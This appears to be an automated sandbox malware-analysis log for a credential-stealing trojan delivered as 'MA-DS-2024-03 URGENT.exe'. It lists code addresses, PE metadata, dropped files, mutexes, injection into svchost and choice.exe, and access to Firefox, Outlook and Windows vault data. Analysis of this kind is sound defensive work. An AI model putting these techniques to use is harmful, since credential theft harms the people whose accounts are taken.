                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0377516C4_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374B1B04_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0380B16B4_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F70E94_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FF0E04_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EF0CC4_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037470C04_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FF7B04_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F16CC4_2_037F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F75714_2_037F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DD5B04_2_037DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037314604_2_03731460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FF43F4_2_037FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FFB764_2_037FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B5BF04_2_037B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0377DBF94_2_0377DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375FB804_2_0375FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B3A6C4_2_037B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FFA494_2_037FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F7A464_2_037F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EDAC64_2_037EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DDAAC4_2_037DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03785AA04_2_03785AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E1AA34_2_037E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037499504_2_03749950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375B9504_2_0375B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D59104_2_037D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AD8004_2_037AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037438E04_2_037438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FFF094_2_037FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FFFB14_2_037FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03741F924_2_03741F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03749EB04_2_03749EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F7D734_2_037F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F1D5A4_2_037F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03743D404_2_03743D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375FDC04_2_0375FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B9C324_2_037B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FFCF24_2_037FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: String function: 00407DE1 appears 35 times
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: String function: 00428900 appears 41 times
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: String function: 00420AE3 appears 70 times
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261097527.000000000434D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MA-DS-2024-03 URGENT.exe
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262163325.00000000041A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MA-DS-2024-03 URGENT.exe
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1253927861.0000000003EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs MA-DS-2024-03 URGENT.exe
                Source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257763215.0000000003EF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs MA-DS-2024-03 URGENT.exe
                Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                Source: MA-DS-2024-03 URGENT.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: MA-DS-2024-03 URGENT.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: MA-DS-2024-03 URGENT.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 0.9893876745345744
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@10/11@5/5
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0169CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_0169CBD0
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Users\user\AppData\Roaming\8e8aaae4f259d5dc.binJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-8e8aaae4f259d5dc9e7986a9-b
                Source: C:\Windows\System32\AppVClient.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-8e8aaae4f259d5dc9ea72c54-b
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-8e8aaae4f259d5dc-inf
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeFile created: C:\Users\user~1\AppData\Local\Temp\autD77C.tmpJump to behavior
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: choice.exe, 00000011.00000002.2500574105.0000000002837000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1971188393.0000000002816000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1973460117.0000000002842000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2500574105.0000000002866000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1971188393.0000000002837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MA-DS-2024-03 URGENT.exeReversingLabs: Detection: 81%
                Source: unknownProcess created: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
                Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"
                Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe"Jump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSection loaded: webio.dllJump to behavior
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: MA-DS-2024-03 URGENT.exeStatic file information: File size 1762304 > 1048576
                Source: MA-DS-2024-03 URGENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000004.00000003.1742846081.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1742827703.000000000301A000.00000004.00000020.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2502923981.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1253573729.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257659688.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fbLIkXRoMf.exe, 00000010.00000000.1675751246.000000000003E000.00000002.00000001.01000000.00000005.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2499888410.000000000003E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261605292.0000000004220000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262757269.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1264514250.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1657811833.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1660023534.0000000003500000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1775134719.0000000004152000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.000000000464E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1777431528.0000000004305000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.00000000044B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261605292.0000000004220000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262757269.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1264514250.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1657811833.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1660023534.0000000003500000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1775134719.0000000004152000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.000000000464E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1777431528.0000000004305000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.00000000044B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257659688.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 00000004.00000003.1742846081.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1742827703.000000000301A000.00000004.00000020.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2502923981.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
                Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: real checksum: 0x1fb4b should be: 0xa8132
                Source: armsvc.exe.0.drStatic PE information: section name: .didat
                Source: alg.exe.0.drStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0167B180 push 0167B0CAh; ret 0_2_0167B061
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0167B180 push 0167B30Dh; ret 0_2_0167B1E6
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0167B180 push 0167B2F2h; ret 0_2_0167B262
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0167B180 push 0167B255h; ret 0_2_0167B2ED
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0167B180 push 0167B2D0h; ret 0_2_0167B346
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0167B180 push 0167B37Fh; ret 0_2_0167B3B7
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0167520C push 0167528Fh; ret 0_2_0167522D
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 0169852Eh; ret 0_2_01697F3A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698514h; ret 0_2_01697F66
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01697E66h; ret 0_2_01698057
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 0169817Ah; ret 0_2_0169808B
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 016982E5h; ret 0_2_016980D9
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 0169826Ah; ret 0_2_0169819E
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 0169849Ch; ret 0_2_016981E4
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698321h; ret 0_2_016982E0
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01697FBFh; ret 0_2_0169831F
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01697FA8h; ret 0_2_0169834C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 016984BAh; ret 0_2_016983E2
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698426h; ret 0_2_016984D8
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698075h; ret 0_2_016984FD
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 0169808Ch; ret 0_2_01698512
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_01698550 push 01698D45h; ret 0_2_016987D3
